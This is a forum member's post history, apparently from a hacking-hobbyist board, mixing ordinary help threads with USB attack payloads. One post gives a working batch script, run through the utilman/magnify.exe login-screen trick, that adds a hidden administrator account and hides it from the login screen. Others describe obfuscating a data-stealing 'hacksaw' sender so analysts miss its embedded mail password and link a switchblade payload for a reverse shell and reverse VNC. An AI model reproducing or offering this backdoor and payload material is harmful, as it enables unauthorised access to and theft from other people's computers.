Jump to content

Joerg

Active Members
  • Posts

    305
  • Joined

  • Last visited

Posts posted by Joerg

  1. Nope, i shorted the plug of a normal thumbdrive. That would only harm the mainboard/thumbdrive.

    But if i change 1 2 3 4 -> 2 1 4 3 of a normal usb cable it fries any plugged in thumbdrive.

  2. Thanks for explanation.

    It was certainly not meant to make your application seem redundant and useless.

    First I wanted to write an own text saying that this method will make your computer safe forever, but it seemed a good idea for me for taking your post, changing the non-common parts and release it as a hardware solution which eliminates the problem of modified usb keys.

  3. After the recent popularity of the USB based attacks I decided it might be nice to have something from the other team, as it were, so I threw together some basic protection against them.

    I'll not release the source yet, it's an absolute mess, but I will release the photo for anyone who'd like to test it...

    It's available below and contains a warning message to explain what the mod does.

    It's nothing special, admittedly, and I'd really rather not get into an arms race with it but I thought it'd be something to keep me occupied and might be useful to someone, so there it is. I may or may not continue development on it depending on whether many find it useful.

    Anyway, it requires a usb port and to the best of my knowledge it should work on Windows XP and Vista, both x86 and x64, and even on all versions of Linux/Unix/Mac/Solaris/BSD/DOS/...

    Enjoy.

    width=600 height=276http://img183.imageshack.us/img183/2973/1337usbtq3.png[/img]

    Just don't use it! It will harm your hardware!

    I took the original post from Moonlit and modified it. No, his application is not redundant.

  4. Usually the firefox profile is stored in %appdataMozilla Firefox (or just Firefox). This means:

    [GER] C:Dokumente und EinstellungenBenutzernameAnwendungsdatenMozilla Firefox

    [ENG] C:Documents and SettingsUsernameApplication DataMozilla Firefox

    I don't have seen the actual code, but if he didn't use variables it might be that he have used fixed paths.

    Another possibility, do you have Firefox?

  5. I've never seen something like a monitoring software which logs that, interesting.

    What I don't understand is, how the users are managed. Can I log me in from any pc in the network with my credentials to my account (sounds a bit like a terminal)?

  6. I'm scripting a kind of one-click-vnc-with-nice-little-buttons-and-graphics for relatives, friends and other not very computer interested persons. I want ssh to tunnel the vnc traffic and create a remote shell (like netcat, only via ssh), so I simulate the existence of the internet in my scenario (vm).

    I tried it but I get the same error.

    I use virtualbox.

    Update:

    Uhm, obvious: if nothing is listening, nothing can be established. Problem solved by installing openssh on the client machine.

  7. After googling I found out that this question is documented, but even after using the same code I can't get it to work (maybe because I used ssh yesterday for the first time).

    I want to connect to a virtual Windows XP machine with my ubuntu machine.

    I installed the openssh-server on ubuntu, forwarded the port 22 on my router and created a dyndns hostname.

    On the Windows XP machine, I'm using PuTTy.

    So, Ubuntu is the server, and Windows the client.

    I want Windows (PuTTy) to connect to Ubuntu (ssh-server) and create a tunnel so I can use this connection to execute some shell commands. So here's what I tried:

    Executed code - Windows (plink is the command line tool of putty)

    plink.exe -R -N 2048:localhost:22 username.of.ubuntu@hostname.of.ubuntu

    I get an connection, enter my username and password of my ubuntu machine.

    Executed code - Ubuntu

    ssh -p 2048 username.of.windows@localhost

    I get an "ssh_exchange_identification: Connection closed by remote host

    " error ? I added "sshd : ALL" to /etc/hosts.allow, but it doesn't seem to help.

    Hmm, does anyone has a solution, and, is it actually possible to have a windows shell under linux/ubuntu?

  8. There exists a not-emulator called Wine (stands for "Wine is not an Emulator") which runs some little programs and even CS without any bigger problems.

    But if you want to use Adobe, Microsoft or other bigger software, it would be better to create a virtual pc (google for virtualbox/vmware/qemu), a pc which does only exists in zeros and ones, but not in metal and silicon. A pc in a pc so to say. On such a virtual pc you can install windows/$OS and use the software you want.

    Not very suitable though.

  9. After putting Debian on my pc I sadly didn't had much time for hak.5 and batch projects :(

    I put FreeDOS on my thumb drive in combination with the utilman or "magnify.exe" and tested it with different computers. I like how easy it works. I post the code once again since I modified it a little bit.

    net user Accountname Accountpassword /add 2>nul
    net localgroup Administratoren Accountname /add 2>nul || net localgroup administrators Accountname /add 2>nul
    net localgroup Benutzer Accountname /delete 2>nul || net localgroup users Accountname /delete 2>nul
    reg.exe add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v Accountname /t REG_DWORD /d 0 2>nul

    This code can be compiled via any batch compiler or again modified to be compiled by the Nullsoft Scripable Install System (very dirty I guess).

  10. The send.exe is the encrypted hacksaw send.bat

    This is useful if someone does an in-depth analysis of the payload and then he may find the mail address and the password which is not so good.

    You can compile and "encrypt" it with the Quick Batch File Compiler.

  11. Yes, one more switchblade modification ;)

    The special thing about this mod is the easy extensibility:

    You have to edit a simple textfile which contains the names of the programs which are launched and add the files at its right place

    Furthermore this mod is designed for a reverse shell and a reverse vnc connection:

    First you make a reverse shell, then you launch the reverse vnc session.

    Ehm, and of course this is the best mod ever existed !111

    Here's the download link:

    http://www.mediafire.com/?9blflslj3z3

    Edit: the password for the virus containing file is "password"

    The documentary is very thin. i tried writing a manual explaining everything but then i realized it's not necessary because you know how that stuff works (i hope so). I'll add detailed informations later (as soon as questions arise) or never :)

×
×
  • Create New...